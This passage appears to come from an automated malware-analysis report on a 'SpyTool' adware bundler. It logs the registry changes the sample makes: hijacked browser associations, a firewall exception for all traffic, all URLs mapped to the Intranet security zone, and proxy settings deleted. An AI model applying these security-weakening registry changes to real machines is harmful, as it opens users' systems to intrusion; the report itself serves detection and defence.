[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"

[HKCR\https\shell]
"(Default)" = "open"

[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"

[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"

[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"

[HKCR\ftp]
"URL Protocol" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"

[HKCR\https\shell\open\ddeexec]
"(Default)" = ""

[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 8D AF 0F C0 DD 39 8B 3B DB 81 6D C6 39 6E 22"

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKCU\Software\Classes\https\shell]
"(Default)" = "open"

[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"

[HKCR\HTTP]
"URL Protocol" = ""

[HKCU\Software\Classes\http\shell]
"(Default)" = "open"

[HKCR\HTTP\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"

[HKCU\Software\Classes\http]
"URL Protocol" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"

[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\https]
"URL Protocol" = ""

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"

[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"

[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"

[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"

[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"

[HKCR\https]
"URL Protocol" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"

[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"

[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"

[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"

[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"

[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"

[HKCR\ftp\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"

[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"

[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"

[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"

The SpyTool deletes the following value(s) in system registry:

[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"

The process taskkill.exe:1804 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 F8 C8 72 6A 25 58 C6 C0 8F A1 13 D7 16 61 AA"

The process taskkill.exe:1796 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 D2 47 99 A6 BE 5B C6 2A 0F 83 FC 0D 7D D8 6E"

The process taskkill.exe:660 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 B4 A2 3A CD 9C 79 85 F5 4C 7A C2 53 AF 62 AF"

The process nsj32.tmp:1912 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 43 2C 21 8C AA B9 EA 22 03 73 D7 00 54 68 6A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process amisid.exe:1952 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 B4 85 DD 3A 06 FC 76 57 37 D8 DE EC 17 9D BE"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\InternetTurbo]
"UID" = "D6A6947B24975DB6AB9DE8B171C5FA6E"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process amisid.exe:1844 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"

[HKCU\Software\InternetTurbo]
"UID" = "D6A6947B24975DB6AB9DE8B171C5FA6E"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 70 41 37 6D B5 5B 0E 16 ED CD 4B 19 D6 0A 8F"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""

The SpyTool deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"

The process tasklist.exe:1852 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 86 10 6C E8 E8 1C CB 75 0E AA 8A ED E5 C5 08"

The process tasklist.exe:324 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 62 09 4B 75 71 D3 E6 0C 9A 6F 10 23 5F 83 60"

The process nss12.tmp:1616 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D E8 0D 1D AA C7 C4 9E 43 52 4E 38 8C CA 58 22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process 9823.exe:320 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3554]
"setup.exe" = "MyBrowser Installer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\CrossBrowser]
"Installation" = "1"

[HKCU\Software\Crossbrowse]
"Preinstall" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 AE 92 EF 52 90 2A 66 AF CE CF BB 2C DA 49 26"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsx36.tmp:1468 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\NlaSvc]
"vpolicy" = "iml"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
